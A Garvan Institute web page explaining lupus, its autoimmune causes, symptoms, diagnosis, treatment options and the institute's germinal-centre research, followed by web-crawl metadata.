• Written By: Darlene Goodman
• Edited By: Michelle Arevalo
• Last Modified Date: 05 July 2017
• Copyright Protected:
2003-2017
Conjecture Corporation
• Print this Article
Free Widgets for your Site/Blog
Astronauts have captured images inside the International Space Station that can be seen on Google Street View. more...
July 26 , 2006 : Andrea Yates was found not guilty of killing her five children by reason of insanity. more...
Many scientists suggest that the sun’s ultraviolet (UV) light waves are harmful to human skin and eye tissue. As a result, the World Health Organization (WHO) created the UV index, a standard system for measuring the amount of UV light that penetrates Earth’s atmosphere. The linear scale is one way for governments and scientists to measure and track ultraviolet light intensity, as well as to warn the public about potential dangers associated with high UV levels.
UV radiation is a specific set of wavelengths on the light spectrum. The waves are shorter than visible light. Often classified as UVA and UVB, these light waves are typically considered more dangerous to the skin and eyes than visible light. The UV index measures the amount of these potentially harmful waves that reaches the lower atmosphere.
There are several factors affecting the ultraviolet light in a given area. First, the position of the sun in the sky is often important. Seasons can affect UV by changing the sun’s distance and angle of light in relation to Earth. Also, UV is often strongest at latitudes closer to the equator.
For the most part, the UV index measures the intensity of light waves at solar noon, or the time of day when the sun is highest in the sky. Sunlight is typically strongest at this time. Solar noon may not be the same as noon on a clock.
Second, atmospheric conditions may affect ultraviolet levels, as well. A thicker atmosphere results in lower radiation, so the UV index level is often different from mountain to valley. Cloud cover may also have an effect, but it does not make a large change, because UV radiation can typically penetrate clouds better than other light wavelengths. In addition, ozone in the high atmosphere may filter harmful UV rays.
Finally, ground reflection may also play a role in the UV index. Snow, water, and sand can reflect UV light. This reflection can intensify the level of ultraviolet rays striking an individual outdoors in these conditions because, not only do they receive UV directly from the sun, but it is reflected back up at them from the ground.
There are several ways to limit an individual’s exposure to UV light. Sunglasses with UVA and UVB filters can protect a person’s eyes from damaging rays. Sunscreens of at least Sun Protection Factor (SPF) 15 are often recommended to protect skin.
Individuals may also wish to seek shade, remain indoors, or at least avoid direct sunlight during peak sunlight hours. Depending on the time zone, this period usually falls between 10:00 a.m. and 4:00 p.m. People may also wish to cover their skin by wearing long sleeves, trousers, and a wide-brimmed hat.
Ad
You might also Like
Recommended
Discuss this Article
Princelety
Post 1
Besides providing a UV index forecast, a local weather service -- in conjunction with the EPA -- can also issue warnings and advisories if the atmospheric conditions make going outside for extended periods of time potentially harmful.
A UV Alert will be issued if the next day's UV forecast is unusually high for a given area in a given time of year. Essentially it's an opportunity to remind people about sun safety (using sunscreen, covering skin exposed to the sun's rays, wearing sunglasses, etc.) when the risk of sunburn and other damage is especially high.
Post your comments
Post Anonymously
Login
username
password
forgot password?
Register
username
password
confirm
email
|
{
"url": "http://www.wisegeek.com/what-is-the-uv-index.htm",
"source_domain": "www.wisegeek.com",
"snapshot_id": "crawl=CC-MAIN-2017-30",
"warc_metadata": {
"Content-Length": "86155",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SBK7VTYHJMUAWX3ULR7YZBVFJMSTJ6OM",
"WARC-Concurrent-To": "<urn:uuid:437178ba-5fb3-455d-803f-521fce3cf712>",
"WARC-Date": "2017-07-26T14:48:28Z",
"WARC-IP-Address": "162.210.232.130",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:A2TAUP4GKNOTKNDVNECKCOBEZWNX2IYE",
"WARC-Record-ID": "<urn:uuid:a917b9f8-42b4-45d8-9bbf-052e2de518c4>",
"WARC-Target-URI": "http://www.wisegeek.com/what-is-the-uv-index.htm",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:61ebd183-df36-4448-b943-d4dd50fcba1e>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-145-169-199.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-30\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for July 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
11,
12,
34,
35,
51,
83,
115,
152,
177,
191,
218,
241,
273,
393,
394,
508,
509,
976,
977,
1323,
1324,
1619,
1620,
1857,
1858,
2277,
2278,
2612,
2613,
2860,
2861,
3167,
3168,
3171,
3172,
3192,
3193,
3205,
3206,
3227,
3228,
3239,
3246,
3247,
3482,
3483,
3812,
3813,
3832,
3833,
3850,
3851,
3857,
3858,
3867,
3876,
3893,
3894,
3903,
3904,
3913,
3922,
3930
],
"line_end_idx": [
11,
12,
34,
35,
51,
83,
115,
152,
177,
191,
218,
241,
273,
393,
394,
508,
509,
976,
977,
1323,
1324,
1619,
1620,
1857,
1858,
2277,
2278,
2612,
2613,
2860,
2861,
3167,
3168,
3171,
3172,
3192,
3193,
3205,
3206,
3227,
3228,
3239,
3246,
3247,
3482,
3483,
3812,
3813,
3832,
3833,
3850,
3851,
3857,
3858,
3867,
3876,
3893,
3894,
3903,
3904,
3913,
3922,
3930,
3935
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3935,
"ccnet_original_nlines": 63,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3583662807941437,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.03820817172527313,
"rps_doc_frac_lines_end_with_ellipsis": 0.03125,
"rps_doc_frac_no_alph_words": 0.15019762516021729,
"rps_doc_frac_unique_words": 0.5023183822631836,
"rps_doc_mean_word_length": 4.851623058319092,
"rps_doc_num_sentences": 41,
"rps_doc_symbol_to_word_ratio": 0.0026350500993430614,
"rps_doc_unigram_entropy": 5.290984153747559,
"rps_doc_word_count": 647,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.013380059972405434,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.01561006996780634,
"rps_doc_frac_chars_top_3gram": 0.01911436952650547,
"rps_doc_frac_chars_top_4gram": 0.011468620039522648,
"rps_doc_books_importance": -402.74017333984375,
"rps_doc_books_importance_length_correction": -402.74017333984375,
"rps_doc_openwebtext_importance": -244.52200317382812,
"rps_doc_openwebtext_importance_length_correction": -244.52200317382812,
"rps_doc_wikipedia_importance": -185.16661071777344,
"rps_doc_wikipedia_importance_length_correction": -185.16661071777344
},
"fasttext": {
"dclm": 0.1902737021446228,
"english": 0.9376564025878906,
"fineweb_edu_approx": 3.3789734840393066,
"eai_general_math": 0.030797839164733887,
"eai_open_web_math": 0.3213186264038086,
"eai_web_code": 0.0009326299768872559
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "535.6",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Physics",
"level_3": "Optics and Light"
}
},
"secondary": {
"code": "613.69",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Health and Hygiene"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "9",
"label": "FAQ"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-2,582,612,358,518,462,500
|
Head-to-Head: NgRx vs Storeon Analysis
@ngrx/store
v17.2.0(about 1 month ago)
This package is actively maintained.Types definitions are bundled with the npm packageNumber of direct dependencies: 1Monthly npm downloads
@ngrx/store is a state management library for Angular applications, inspired by Redux. It provides a centralized store for managing the state of your application and enables predictable state management through a unidirectional data flow. With @ngrx/store, you can define actions, reducers, and selectors to manage and access application state in a structured and efficient way.
Alternatives:
redux+
mobx+
zustand+
recoil+
effector+
easy-peasy+
valtio+
pullstate+
overmind+
unistore+
Tags: angularstate-managementreduxpredictable-state-managementreactive-programming
storeon
v3.1.5(about 2 years ago)
This package was last published over a year ago. It may not be actively maintained.Types definitions are bundled with the npm packageNumber of direct dependencies: 0Monthly npm downloads
Storeon is a tiny and flexible state management library for modern web applications. It provides a simple and efficient way to manage the state of your application using a unidirectional data flow architecture. Storeon is lightweight, with a size of less than 1KB, making it ideal for projects where bundle size is a concern. It offers a plugin-based architecture, allowing you to extend its functionality with ease.
Alternatives:
redux+
mobx+
zustand+
recoil+
effector+
easy-peasy+
valtio+
jotai+
pullstate+
overmind+
Tags: javascriptstate-managementunidirectional-data-flowlightweightplugin-based
Fight!
State Management Approach
Both @ngrx/store and Storeon are state management libraries for JavaScript applications. @ngrx/store is based on the Redux pattern and provides a centralized store with actions, reducers, and selectors. Storeon, on the other hand, follows a different approach by using event-driven programming and a minimalistic API.
Scalability
@ngrx/store is well-suited for large-scale applications with complex state management needs. It provides tools like middleware, effects, and devtools for handling asynchronous actions and side effects. Storeon, being lightweight and focused on simplicity, may be more suitable for smaller applications or projects where a simpler state management solution is preferred.
Performance
In terms of performance, Storeon is known for its lightweight footprint and efficient event handling, which can lead to better performance in certain scenarios. @ngrx/store, while powerful and feature-rich, may introduce more overhead due to its adherence to the Redux pattern and the associated concepts like immutability and reducers.
Developer Experience
Both libraries offer good developer experiences, but @ngrx/store might have a steeper learning curve for developers new to the Redux pattern. Storeon's minimalistic API and event-driven approach can be easier to grasp for beginners or developers looking for a simpler state management solution.
Community and Ecosystem
@ngrx/store is part of the larger NgRx ecosystem, which includes tools for state management, effects, and entity management specifically tailored for Angular applications. Storeon, while not as widely adopted, has a growing community and is agnostic to any specific framework, making it more versatile for use in different types of JavaScript applications.
|
{
"url": "https://moiva.io/?npm=@ngrx/store+storeon",
"source_domain": "moiva.io",
"snapshot_id": "CC-MAIN-2024-22",
"warc_metadata": {
"Content-Length": "42389",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:FXBGGF7BQ5KJZX4XQYWSPCHRVKGEPKIG",
"WARC-Concurrent-To": "<urn:uuid:ed3c8f84-e25d-43c9-b8ab-34ca8b9576b7>",
"WARC-Date": "2024-05-24T11:27:47Z",
"WARC-IP-Address": "104.21.53.158",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:AP2SMZZ5IDU3FWE2YAYONY5F77VZLGJU",
"WARC-Record-ID": "<urn:uuid:5920f348-22e0-4fcc-b26a-860387112f6c>",
"WARC-Target-URI": "https://moiva.io/?npm=@ngrx/store+storeon",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:0f3bfc39-7661-41d7-8e73-9adb29fa1897>"
},
"warc_info": "isPartOf: CC-MAIN-2024-22\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May 2024\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-28\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
39,
40,
52,
53,
80,
81,
221,
222,
601,
602,
616,
623,
629,
638,
646,
656,
668,
676,
687,
697,
707,
708,
791,
792,
800,
801,
827,
828,
1015,
1016,
1433,
1434,
1448,
1455,
1461,
1470,
1478,
1488,
1500,
1508,
1515,
1526,
1536,
1537,
1617,
1618,
1625,
1626,
1652,
1653,
1971,
1972,
1984,
1985,
2355,
2356,
2368,
2369,
2706,
2707,
2728,
2729,
3024,
3025,
3049,
3050
],
"line_end_idx": [
39,
40,
52,
53,
80,
81,
221,
222,
601,
602,
616,
623,
629,
638,
646,
656,
668,
676,
687,
697,
707,
708,
791,
792,
800,
801,
827,
828,
1015,
1016,
1433,
1434,
1448,
1455,
1461,
1470,
1478,
1488,
1500,
1508,
1515,
1526,
1536,
1537,
1617,
1618,
1625,
1626,
1652,
1653,
1971,
1972,
1984,
1985,
2355,
2356,
2368,
2369,
2706,
2707,
2728,
2729,
3024,
3025,
3049,
3050,
3406
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3406,
"ccnet_original_nlines": 66,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2938311696052551,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.004870130214840174,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.20616883039474487,
"rps_doc_frac_unique_words": 0.4618736505508423,
"rps_doc_mean_word_length": 6.1089324951171875,
"rps_doc_num_sentences": 27,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.947682857513428,
"rps_doc_word_count": 459,
"rps_doc_frac_chars_dupe_10grams": 0.06205420941114426,
"rps_doc_frac_chars_dupe_5grams": 0.14265334606170654,
"rps_doc_frac_chars_dupe_6grams": 0.10271041095256805,
"rps_doc_frac_chars_dupe_7grams": 0.10271041095256805,
"rps_doc_frac_chars_dupe_8grams": 0.10271041095256805,
"rps_doc_frac_chars_dupe_9grams": 0.06205420941114426,
"rps_doc_frac_chars_top_2gram": 0.048145510256290436,
"rps_doc_frac_chars_top_3gram": 0.016048500314354897,
"rps_doc_frac_chars_top_4gram": 0.026390869170427322,
"rps_doc_books_importance": -271.49163818359375,
"rps_doc_books_importance_length_correction": -271.49163818359375,
"rps_doc_openwebtext_importance": -141.7055206298828,
"rps_doc_openwebtext_importance_length_correction": -141.7055206298828,
"rps_doc_wikipedia_importance": -76.48957824707031,
"rps_doc_wikipedia_importance_length_correction": -76.48957824707031
},
"fasttext": {
"dclm": 0.41713839769363403,
"english": 0.8868057727813721,
"fineweb_edu_approx": 1.7054938077926636,
"eai_general_math": 0.18532437086105347,
"eai_open_web_math": 0.17514747381210327,
"eai_web_code": 0.4650377631187439
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.452",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-2,659,789,098,575,274,500
|
Why Wear Compression Garments
Minimize Swelling, Bruising, and Pain
Well-made surgical compression garments are designed to provide the perfect amount of pressure uniformly across your body. This keeps swelling in check and keeps discomfort to a minimum. Without the garment, swelling can be more severe, which leads to tense skin, irritated nerve fibers and damaged blood vessels. A compression garment helps minimize all of these things, it lets you recover quicker, and makes the whole process more comfortable.
Prevent Skin Dimpling
For about 4-6 weeks after surgery, your body will be working overtime to heal. Just as you form a scar to mend a cut on your finger, you also form scar tissue under your skin after you have surgery. Without the garment, your skin will be building scar tissue all over, and that’s how you wind up with dimples, wrinkles, and depressions in your skin. These irregularities are much less likely to happen if you wear your compression garment.
Encourage Saggy Skin to Shrink
The garment minimizes and smooths saggy skin. It’s natural for skin to sag after the fat is removed. Without the right compression garment, skin doesn’t heal in the right place. The proper compression helps shrink and contract so that it eventually looks like the fat was never there. The garment doesn’t guarantee that all the skin will tighten up, but it helps improve consistency.
Wearing a high-quality compression garment is almost as important as the surgery itself. If you choose not to wear your garment, even the best plastic surgeon can’t give you perfect results. Liposuction is all about the way things heal, not about the way the fat is removed. In many ways you actually play the most important role in how good your final result will be.
First Stage and Second Stage Garments
Stage One garments provide proper compression immediately following surgery and are to be worn as your doctor specifies. This zippered garment with hooks and eyes, and reinforced seams, allows for uniform radial compression and durability during the critical immediate post-operative period, and easy on and off removal.
Stage garments provide continued healing compression and support during the second stage of recovery (typically 2-8 weeks post-op). This non-zippered, pull-on garment is for additional support to the newly contoured body. Second stage garments also fit smoothly under clothing as patients become more active and keep zippers from making impressions in the skin.
|
{
"url": "https://isavela.com/pages/why-wear-compression-garments",
"source_domain": "isavela.com",
"snapshot_id": "crawl=CC-MAIN-2022-40",
"warc_metadata": {
"Content-Length": "352732",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:JZ4XVMXHZA4JN4TYYFTTHNKBJ4GYVIMK",
"WARC-Concurrent-To": "<urn:uuid:e3de6e8a-b02b-429a-9566-d3b7a683120c>",
"WARC-Date": "2022-10-01T23:46:04Z",
"WARC-IP-Address": "23.227.38.32",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:4ZL35VK47YNT5NO6WLKVOMLFGJG6N2V2",
"WARC-Record-ID": "<urn:uuid:6ea3f370-e809-4f60-84eb-26f4fe9ce94f>",
"WARC-Target-URI": "https://isavela.com/pages/why-wear-compression-garments",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:d28846dc-72c9-4ad1-865f-e7cf0c4809e5>"
},
"warc_info": "isPartOf: CC-MAIN-2022-40\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September/October 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-88\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
30,
31,
69,
70,
517,
518,
540,
541,
981,
982,
1013,
1014,
1398,
1399,
1768,
1769,
1807,
1808,
2129,
2130
],
"line_end_idx": [
30,
31,
69,
70,
517,
518,
540,
541,
981,
982,
1013,
1014,
1398,
1399,
1768,
1769,
1807,
1808,
2129,
2130,
2491
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2491,
"ccnet_original_nlines": 20,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.39361703395843506,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.002127659972757101,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12978723645210266,
"rps_doc_frac_unique_words": 0.5074999928474426,
"rps_doc_mean_word_length": 5.072500228881836,
"rps_doc_num_sentences": 22,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.88845157623291,
"rps_doc_word_count": 400,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.01971413940191269,
"rps_doc_frac_chars_top_3gram": 0.016757020726799965,
"rps_doc_frac_chars_top_4gram": 0.014785610139369965,
"rps_doc_books_importance": -217.86685180664062,
"rps_doc_books_importance_length_correction": -217.86685180664062,
"rps_doc_openwebtext_importance": -120.20850372314453,
"rps_doc_openwebtext_importance_length_correction": -120.20850372314453,
"rps_doc_wikipedia_importance": -43.92570114135742,
"rps_doc_wikipedia_importance_length_correction": -43.92570114135742
},
"fasttext": {
"dclm": 0.044161081314086914,
"english": 0.9470239877700806,
"fineweb_edu_approx": 1.4900593757629395,
"eai_general_math": 0.007021490018814802,
"eai_open_web_math": 0.2855868935585022,
"eai_web_code": 0.0015771399484947324
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "617.62",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Surgery and Dentistry"
}
},
"secondary": {
"code": "615.5",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,645,961,559,659,031,000
|
“Nine out of ten people with lupus are women.”
Lupus
Lupus, also known as systemic lupus erythematosus (SLE), is an autoimmune disease that causes various tissues in the body to become chronically inflamed. It can affect many parts of the body, typically the skin, joints, kidneys, various types of blood cells, the brain, and the lining of the heart and lungs. A butterfly-shaped rash across the face is a characteristic sign of the disease. Lupus can be mild or life-threatening, depending on which parts of the body are affected.
Lupus affects one in 700 Australians. Nine out of every ten people with lupus are women, with the onset of disease usually occurring between 20 and 50 years of age. People from all ethnic backgrounds can develop the disease although it tends to be more severe in African Americans and Asians than Caucasians.
The causes of lupus
The immune system normally protects the body against foreign invaders, like bacteria and viruses. However, in autoimmune diseases like lupus, for reasons which are not fully understood, immune cells are reprogrammed to attack the body’s own cells and tissues. In addition to lupus other examples of autoimmune diseases are rheumatoid arthritis , type 1 diabetes, Sogrens syndrome and multiple sclerosis. Together autoimmune diseases of various kinds affect approximately 5% of the population.
The exact cause of lupus is unknown, although it is likely that environmental factors trigger the autoimmune attack in genetically susceptible people. As a result, autoantibodies are made to DNA and various blood cells with which they combine to form ‘immune complexes’. These complexes are then deposited in the blood vessels supplying various organs in the body leading to tissue damage and the typical clinical features of the disease like skin rash.
The symptoms of lupus
Symptoms vary greatly between individuals and can fluctuate between active periods (flares) and times of minimal or no symptoms (remission). They include:
• Sunlight sensitive rashes on the face and body
• Painful inflammation of one or more joints, which may cause the disease to be mistaken for rheumatoid arthritis
• Impaired kidney function due to severe inflammation and immune cell blockage of the blood vessels
• Mouth ulcers
• Chest pain due to pleurisy (inflammation of the lining surrounding the lungs)
• Blood clotting problems
• Hair loss
• Unexplained headaches, fits or mood swings
• Extreme fatigue
• Recurrent miscarriages
Options for lupus treatment
In view of the great variation in clinical presentations, it is most important to confirm the diagnosis of lupus. This is done by performing a blood test for anti-DNA antibodies which are a hallmark of the diseases, taking biopsies of skin and other tissues to ascertain the extent of the disease and checking for abnormalities in blood cells.
In the absense of a definite cause, treatment is designed to minimise sun exposure when relevant, to suppress immune complex-induced inflammation and to restore organ function in the case of more severe disease. A range of drugs are available for this purpose including non Steroidal anti-inflammatory agents, antimalarials, and cortisone combined if necessary with cytotoxic drugs( eg cyclophosphamide) when organ function is severely impaired.
Garvan's research into lupus
The immunology division at the Garvan has a major interest in working out why a small proportion of people (<10%) make the autoantibodies that cause autoimmune diseases like lupus; and others do not. A range of experimental models is being used for this purpose with the current focus being on a particular structure in lymph glands and spleen called the ‘germinal centre’.
The white blood cells destined to make antibodies( B lymphocytes) collect there after stimulation and normally mature into cells which produce antibodies to foreign microorganisms. According to our recent work it is becoming apparent that the maturation process in germinal centres is defective in autoimmune diseases, resulting in escape of autoantibody producing B lymphocytes and a breakdown in immune tolerance.
Particularly exciting in the fact that we can now visualise the selective procedure in germinal centres directly under a special 2 photon microscope. Based on such information the next step will be to devise therapeutic strategies for reprogramming the germinal centre to shut down autoimmunity.
Help us continue our research into lupus and other autoimmune diseases
Donate Now
Further Information
Lupus Foundation of America
The Lupus Association of NSW
Quick Facts
• “Lupus affects one in 700 Australians.”
• “African Americans and Asians tend to get lupus far more frequently and more severely than Caucasians.”
Related News
© Garvan Institute 2017
|
{
"url": "https://www.garvan.org.au/research/diseases-we-research/lupus",
"source_domain": "www.garvan.org.au",
"snapshot_id": "crawl=CC-MAIN-2017-13",
"warc_metadata": {
"Content-Length": "84117",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:UVEVBNEMQEUTUAWLGH3EJIMSFVBSFCSY",
"WARC-Concurrent-To": "<urn:uuid:f7bd4c94-ae86-4d54-b8de-10b3b0f85cd0>",
"WARC-Date": "2017-03-27T16:25:54Z",
"WARC-IP-Address": "45.33.126.53",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:564PLBUFCUWJQPE7YZB33LSQ4KSAMPZ2",
"WARC-Record-ID": "<urn:uuid:0a83d049-3b26-4202-8992-dd9db18eb6d7>",
"WARC-Target-URI": "https://www.garvan.org.au/research/diseases-we-research/lupus",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:4f425284-aea1-457f-bafe-bb8c89d8861c>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-233-31-227.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2017-13\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for March 2017\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
47,
48,
54,
55,
536,
537,
846,
847,
867,
868,
1361,
1362,
1817,
1818,
1840,
1841,
1996,
1997,
2048,
2164,
2266,
2283,
2365,
2393,
2407,
2454,
2474,
2501,
2502,
2530,
2531,
2875,
2876,
3322,
3323,
3352,
3353,
3728,
3729,
4148,
4149,
4446,
4447,
4518,
4519,
4530,
4550,
4551,
4579,
4580,
4609,
4610,
4622,
4666,
4774,
4787,
4788
],
"line_end_idx": [
47,
48,
54,
55,
536,
537,
846,
847,
867,
868,
1361,
1362,
1817,
1818,
1840,
1841,
1996,
1997,
2048,
2164,
2266,
2283,
2365,
2393,
2407,
2454,
2474,
2501,
2502,
2530,
2531,
2875,
2876,
3322,
3323,
3352,
3353,
3728,
3729,
4148,
4149,
4446,
4447,
4518,
4519,
4530,
4550,
4551,
4579,
4580,
4609,
4610,
4622,
4666,
4774,
4787,
4788,
4811
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4811,
"ccnet_original_nlines": 57,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.37514933943748474,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.010752690024673939,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1242532879114151,
"rps_doc_frac_unique_words": 0.4986630976200104,
"rps_doc_mean_word_length": 5.2540106773376465,
"rps_doc_num_sentences": 29,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.283311367034912,
"rps_doc_word_count": 748,
